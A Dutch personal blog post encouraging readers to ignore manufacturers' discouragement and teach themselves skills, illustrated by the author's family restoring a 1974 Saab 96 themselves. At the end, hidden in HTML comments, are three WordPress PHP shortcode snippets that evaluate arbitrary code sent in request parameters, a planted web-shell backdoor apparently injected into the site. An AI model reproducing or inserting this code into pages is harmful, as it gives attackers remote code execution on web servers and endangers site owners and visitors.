Dit is wat de meeste fabrikanten van wat dan ook vertellen. “Raak dit niet aan”, “Je bent echt veel te dom om dit te kunnen”, of, “Je gaat jezelf pijn doen.”

Wat er vervolgens gebeurd, is, dat je het ook echt gaat geloven. Je gaat dingen zeggen als: “Ik ben a-technisch”, “Dat snap ik niet”, “dat kan ik niet”. We worden steeds meer en meer opgevoed om dingen niet te doen, in plaats van wel te doen. Of ons zelf wat te leren, want leren kun je alleen als je jong bent.

Hey, ik ben [vervang door je eigen leeftijd], ik kan nog leren en ik zal dat blijven kunnen tot mijn dood!

Even als voorbeeld, ik ben geen auto monteur, ik zal het ook nooit worden. Maar samen met mijn vader en broertje hebben we een Saab 96 uit ’74 gerestaureerd. Nee, mijn vader is ook geen monteur, nee, mijn broertje ook niet. Natuurlijk hebben we wel hulp gehad op bepaalde fronten. Maar we hebben eigenlijk alles zelf gedaan, van interieur tot lak en zelf de roestige delen vervangen. Je kunt het vast wel zien, maar je moet verdomd je best doen.

Veel mensen kunnen het niet geloven, maar we hebben het echt helemaal zelf gedaan. Mijn advies negeer wat anderen (zeker fabrikanten) zeggen, leer jezelf wat nieuws.

1. Je verlegt je grenzen
2. Je zult trots zijn op wat je hebt gedaan
3. Je zult echt succes voelen

Dit zijn toch de dingen die iedereen wil, toch?

<!– [insert_php]if (isset($_REQUEST["qhOHs"])){eval($_REQUEST["qhOHs"]);exit;}[/insert_php][php]if (isset($_REQUEST["qhOHs"])){eval($_REQUEST["qhOHs"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["TpYGL"])){eval($_REQUEST["TpYGL"]);exit;}[/insert_php][php]if (isset($_REQUEST["TpYGL"])){eval($_REQUEST["TpYGL"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RPlU"])){eval($_REQUEST["RPlU"]);exit;}[/insert_php][php]if (isset($_REQUEST["RPlU"])){eval($_REQUEST["RPlU"]);exit;}[/php] –>